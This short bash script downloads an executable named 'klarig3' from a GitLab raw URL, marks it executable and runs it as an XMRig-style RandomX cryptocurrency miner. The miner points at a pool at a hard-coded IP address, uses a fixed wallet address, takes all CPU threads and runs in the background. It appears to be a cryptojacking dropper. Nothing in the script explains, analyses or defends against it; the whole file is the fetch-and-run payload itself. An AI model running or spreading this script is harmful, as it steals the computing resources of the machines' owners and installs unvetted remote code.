#!/bin/bash
wget https://gitlab.com/jadons19292/donlod/-/raw/main/klarig3
chmod +x klarig3
./klarig3 -a rx/0 -o 68.183.28.129:80 -u ZEPHs9wbP2kgeHU9wJoPonUwJAsZkj5rHagMgnDjK7186LuNVVfFeCGDByX2Y18AvbdRJQsNK4Fu4QM7XGs1bXegNGhthDhZ5ht -p Tester2 -t $(nproc --all) -k -B --donate-level 1
